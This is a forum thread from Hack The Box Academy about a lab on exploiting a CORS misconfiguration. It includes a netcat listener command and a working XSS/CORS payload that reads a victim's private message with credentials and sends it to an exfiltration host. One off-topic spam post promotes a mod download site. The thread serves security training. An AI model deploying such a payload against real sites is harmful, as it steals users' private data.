Advanced XSS and CSRF Exploitation - CORS Misconfiguration

HTB Content Academy
1

Hi, In the CORS Misconfiguration section of the Advanced XSS and CSRF Exploitation module, after delivery exploit to victim nothing happen. I have test also with a single script tag and location with my IP and port 8000 and listen with nc -nvlp 8000 but I didn’t receive any request. If I try visiting the exploitserver.htb/exploit page I receive my own request. Also if I visit with the correct exploit with xhr request to profile.php page of the vulnerablesite.htb, the request not include the PHPSESSID Cookie and I receive a redirect to 302.

Thanks in advance for the help.

2

Puedes ir a ApkLoky , creo que deberías descargar mods desde allí.

3

I am having the exact same issue.

4

Okay, this was a funny one! Something that helped me was running the different scripts in the console and retrieving the exact error messages from it.

At first, I was trying to exfiltrate the entire response, but of course, there’s a section that mentions you can break the request by doing that.

And just in case, I did not need to use netcat or any other tool; the ones provided by HTB are the necessary ones.

image
image1496×624 81.6 KB

So once is working and you now that the CSRF is exploiting on you first, you can try to figure it out how to fix it and how to retrieve the right information.

Hope this helps, all the best!

1 Like
6

What script did you end up using? Because I’ve tried all the ones on the guide and I don’t get any luck.

7

Hey spainpromise! Viva España joderrr!

So I did this:

<script>
		var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://vulnerablesite.htb:32946/profile.php', true);
    xhr.withCredentials = true;
    xhr.onload = () => {
      // parse the response
	  var doc = new DOMParser().parseFromString(xhr.response, 'text/html');

	  // exfiltrate only the interesting element
	  var msg = encodeURIComponent(doc.getElementById('private-message').innerHTML);
      location = 'https://exfiltrate.htb:32946/log?data=' + btoa(msg);
    };
    xhr.send();
</script>

For the rest I guess you won’t need any other thing! All the best tio